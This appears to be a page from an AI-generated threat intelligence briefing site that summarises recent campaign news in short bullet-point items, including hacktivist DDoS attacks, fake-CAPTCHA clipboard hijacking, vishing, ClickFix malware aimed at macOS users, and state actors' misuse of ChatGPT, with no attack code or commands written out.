OpenBrief

← Back to All

Category: 🎯 Campaigns
AI-Powered Threat Intel Briefings ·

Top Stories

DDoS Attacks by Hacktivists Target Swedish Services
Recent DDoS attacks in Sweden, attributed to the pro-Russian group NoName057(16), highlight the challenges of responding to hacktivism. Experts suggest that overreacting to these incidents may inadvertently support the attackers' goals. +

Key points:

  • Swedish services like Swish and Bank-id have faced DDoS attacks recently.
  • The pro-Russian group NoName057(16) has claimed responsibility for attacks in Sweden and the Netherlands.
  • DDoS attacks are often seen as a form of hacktivism aimed at drawing attention to specific issues.
  • Experts recommend a balanced response to avoid victim-blaming and empower attackers.
  • Media coverage has improved, providing context to reduce public panic during such incidents.
Sources: CSO Online (1 articles)
CSO Online
New Phishing Campaign Uses Fake CAPTCHA to Deliver Malware via Clipboard Hijacking
A new phishing campaign employs fake CAPTCHA interfaces to trick users into executing malware commands via clipboard hijacking. This method circumvents traditional download prompts, exploiting user fatigue with security checks. +

Key points:

  • Attackers clone Cloudflare's Turnstile CAPTCHA to deceive users into executing malicious commands.
  • Victims are guided to paste and run hidden PowerShell commands, leading to malware installation.
  • The campaign exploits user 'verification fatigue' by mimicking legitimate security checks.
  • Notable malware delivered includes information stealers like Lumma and remote access trojans like NetSupport Manager.
  • This technique has been adopted by various threat actors, including state-sponsored groups.
Sources: CSO Online (1 articles)
CSO Online
Analysis of Vishing Threats Highlights Risks from Social Engineering
Organizations face increasing risks from vishing, a voice-based social engineering tactic used by threat actors like UNC3944 and UNC6040. These actors exploit trust to gain unauthorized access to sensitive information and systems, emphasizing the need for robust internal security measures. +

Key points:

  • Vishing is increasingly used by financially motivated actors to manipulate employees into divulging sensitive information.
  • The group UNC3944 uses vishing to reset credentials and gain broader network access, while UNC6040 targets Salesforce data for exfiltration.
  • Organizations can enhance their defenses by understanding the tactics of these actors and conducting thorough internal assessments.
  • Mandiant's Red Team Assessments demonstrate the effectiveness of simulating vishing attacks to identify security weaknesses.
  • Open-source intelligence gathering is crucial for attackers to develop effective social engineering campaigns.
Sources: Google Cloud Threat Intel (1 articles)
Google Cloud Threat Intel
Hacktivism Evolves into Cybercrime: The Rise of Hybrid Threat Actors
The distinction between hacktivism and cybercrime is diminishing as groups like FunkSec and KillSec transition to financially motivated ransomware operations. This shift complicates threat attribution and response strategies for cybersecurity defenders. +

Key points:

  • FunkSec, originally a hacktivist group, has transitioned to a ransomware-as-a-service model, claiming 172 victims.
  • KillSec, aligned with Anonymous, shifted from DDoS attacks to ransomware operations, launching tools for affiliates.
  • Both groups exemplify the convergence of ideologically driven actions with profit-oriented cybercrime.
  • This trend poses new challenges for cybersecurity professionals in attribution and mitigation efforts.
Sources: Rapid7 Research Blog (1 articles)
Rapid7 Research Blog
Microsoft to Showcase AI-First Security Solutions at Gartner Summit
Microsoft will present its AI-first security platform at the Gartner Security & Risk Management Summit, highlighting innovations and insights on managing cybersecurity risks. Attendees can engage in sessions and one-on-one meetings with experts. +

Key points:

  • The Gartner Security & Risk Management Summit will take place in June 2025, focusing on modern cybersecurity challenges.
  • Microsoft will offer two key sessions on AI in security and data governance with Microsoft Purview.
  • Attendees can book one-on-one meetings with Microsoft experts to discuss cybersecurity strategies and product capabilities.
  • The event aims to provide insights into managing risks in the evolving landscape of AI and quantum computing.
Sources: Microsoft Threat Intelligence Blog (1 articles)
Microsoft Threat Intelligence Blog

Other Updates

Fake Docusign and Gitcode Sites Distribute NetSupport RAT via PowerShell
Deceptive sites are spreading NetSupport RAT through malicious PowerShell scripts. +

Key points:

  • Malicious PowerShell scripts are hosted on fake Gitcode and Docusign sites.
  • Users are deceived into executing scripts that download and install NetSupport RAT.
  • Clipboard poisoning is used to facilitate script execution via CAPTCHA verifications.
  • The attack employs multiple stages to evade detection and enhance resilience.
  • Similar techniques were noted in a previous SocGholish campaign.
Sources: The Hacker News (1 articles)
The Hacker News
New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users
A campaign leveraging ClickFix tactics targets macOS users with the Atomic macOS Stealer malware. +

Key points:

  • The campaign uses fake Spectrum domains to lure users into downloading AMOS.
  • Malicious shell scripts are executed to steal passwords and download further payloads.
  • Russian-speaking cybercriminals are suspected due to language artifacts in the malware.
  • ClickFix tactics are increasingly used to deliver various malware types, including trojans and ransomware.
  • Multiple attacks have been identified across EMEA and the U.S., indicating a growing trend.
Sources: The Hacker News (1 articles)
The Hacker News
Malicious Browser Extensions Target 722 Users in Latin America Since Early 2025
A campaign has infected 722 users with malicious browser extensions, focusing on Brazilian targets. +

Key points:

  • The campaign, named Operation Phantom Enigma, has affected users in Brazil, Colombia, and other countries.
  • Attackers used phishing emails disguised as invoices to deploy malicious extensions for Chromium-based browsers.
  • The malicious extensions were designed to siphon user authentication data from banking websites.
  • The attackers leveraged compromised company servers to increase the likelihood of successful phishing attempts.
  • Detected malicious extensions have been removed from the Chrome Web Store.
Sources: The Hacker News (1 articles)
The Hacker News
OpenAI Bans ChatGPT Accounts Linked to State-Backed Hacking and Disinformation
Malicious actors exploited ChatGPT for cyber operations, including fake resumes and misinformation campaigns. +

Key points:

  • OpenAI identified 10 malicious operations using ChatGPT for social engineering and malware campaigns.
  • Four campaigns were likely linked to Chinese actors, while others involved Russian trolls generating election misinformation.
  • Threat actors created fake IT worker personas and auto-generated resumes to facilitate cyber operations.
  • A Russian actor developed malware named ScopeCreep using ChatGPT, employing advanced operational security measures.
  • The malware was distributed via a spoofed legitimate tool, showcasing the evolving misuse of AI in cybercrime.
Sources: The Record by Recorded Future (1 articles)
The Record by Recorded Future
US Offers $10M Reward for Information on RedLine Malware Developer
The US is incentivizing information on RedLine malware developer Maxim Rudometov with a $10 million reward. +

Key points:

  • The US State Department is administering a $10 million reward for information on Maxim Rudometov, linked to the RedLine malware.
  • Rudometov, believed to be in Krasnodar, Russia, developed RedLine, which has infected millions since 2020.
  • He sold RedLine as malware-as-a-service, enabling cybercriminals to conduct their own attacks.
  • Rudometov faces criminal charges related to the use and distribution of RedLine and Meta malware strains.
  • The malware is known for stealing personal, financial, and cryptocurrency information from victims.
Sources: The Register Security (1 articles)
The Register Security
China Claims Taiwan Operates Ineffective APT Groups with US Support
China's report critiques Taiwan's APT groups as ineffective and reliant on known vulnerabilities. +

Key points:

  • China identifies five APT groups allegedly linked to Taiwan, including APT-C-65 and APT-C-67.
  • The report claims these groups primarily use phishing and known vulnerabilities for attacks.
  • China asserts that the APT groups lack advanced capabilities and rely on public resources.
  • The report suggests that their anti-tracing methods are weak, making attribution easier.
  • China's cybersecurity agencies co-authored the report, which also critiques US involvement.
Sources: The Register Security (1 articles)
The Register Security
Mikko Hyppönen Shifts Focus from Cybersecurity to Drone Warfare Amid Ukraine Conflict
Mikko Hyppönen pivots to drone technology, citing the Ukraine war's impact on modern warfare. +

Key points:

  • Hyppönen has over 34 years of experience in cybersecurity, previously with F-Secure.
  • He will join Sensofusion, focusing on anti-drone technology and systems.
  • The Ukraine conflict has highlighted the significant role of drones in warfare.
  • Hyppönen draws parallels between drone security and cybersecurity threats.
  • He predicts a future with fully autonomous drones making combat decisions.
Sources: The Register Security (1 articles)
The Register Security

Read More by Category

All 💣 Exploits 🚨 Intrusions 🎯 Campaigns ☁️ Cloud 🤖 AI 🪙 Blockchain 🏛️ Policy

Additional Signals

No additional signals worth mentioning in this category from the past 72 hours.